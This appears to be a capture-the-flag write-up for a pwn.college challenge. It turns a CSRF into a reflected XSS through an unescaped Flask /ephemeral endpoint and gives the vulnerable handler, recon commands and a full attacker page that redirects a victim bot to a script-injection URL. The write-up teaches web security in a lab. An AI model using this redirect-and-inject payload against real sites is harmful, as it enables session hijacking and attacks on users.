CSRF Reflected Alert (pwn.college)

Summary

We pivot a CSRF into a reflected XSS by sending the victim to /ephemeral?msg=..., which reflects msg directly into HTML. The attacker page at http://hacker.localhost:1337/ auto-navigates the victim to a URL containing <script>alert("PWNED")</script>, causing the alert to fire in http://challenge.localhost.

Start

The challenge provides two binaries:

./server runs the target web app at http://challenge.localhost
./victim launches a headless browser and visits the attacker site at http://hacker.localhost:1337/

We run:

cd /challenge
./server &

Finding the sink

The login page only shows a POST form:

curl -s http://challenge.localhost | rg -n "form|input|name="

            <form action=login method=post>
              Username:<input type=text name=username>
              Password:<input type=text name=password>
              <input type=submit name=submit value=Login>
            </form><hr>

That suggests the reflected GET is somewhere else. We discover routes and sinks by inspecting the server binary:

strings ./server | rg -o "/[A-Za-z0-9_/-]+" | sort -u
strings ./server | rg -i "msg|message|search|q|query|redirect|return|error"

This reveals:

@app.route("/ephemeral", methods=["GET"])
def challenge_ephemeral():
    return f"""
        <html><body>
        <h1>You have received an ephemeral message!</h1>
        The message: {flask.request.args.get("msg", "(none)")}
        <hr><form>Craft an ephemeral message:<input type=text name=msg action=/ephemeral><input type=submit value=Submit></form>
        </body></html>

So /ephemeral?msg=... reflects msg into the response HTML without escaping.

Quick confirmation:

curl -s "http://challenge.localhost/ephemeral?msg=ZZZ" | rg -n ZZZ

curl -s "http://challenge.localhost/ephemeral?msg=Kru" | rg -n Kru
4:        The message: Kru

The sink (/ephemeral)

The handler effectively behaves like:

<h1>You have received an ephemeral message!</h1>
The message: {msg}

Because msg is inserted directly into HTML, it is a classic reflected XSS sink.

The CSRF pivot

We control http://hacker.localhost:1337/. The victim bot visits that URL automatically. We can use that page to force a GET request to:

http://challenge.localhost/ephemeral?msg=<script>alert("PWNED")</script>

That makes the victim browser execute the script on the target origin.

Avoiding the pitfall

Embedding <script>...</script> inside a <script> tag will terminate the attacker page's own script early.

Fix: build the closing tag dynamically:

const end = "</s" + "cript>";

Final attacker page

We serve this as /tmp/index.html so it is reachable at http://hacker.localhost:1337/:

<!doctype html><meta charset="utf-8">
<title>csrf</title>
<script>
  const end = "</s" + "cript>";
  const payload = "<script>alert(\"PWNED\")" + end;
  const url = "http://challenge.localhost/ephemeral?msg=" + encodeURIComponent(payload);
  location = url;
</script>

Host it:

python3 -m http.server 1337 --directory /tmp &

Triggering the victim

In another terminal:

./victim

The victim:

Logs into http://challenge.localhost
Visits http://hacker.localhost:1337/
Gets redirected to /ephemeral?msg=...
Executes the reflected XSS

Result: alert("PWNED").

PreviousRoot me (Self XSS - Race Condition)Nextcsrf xss cookie (pwn.college)

Last updated 6 minutes ago

Was this helpful?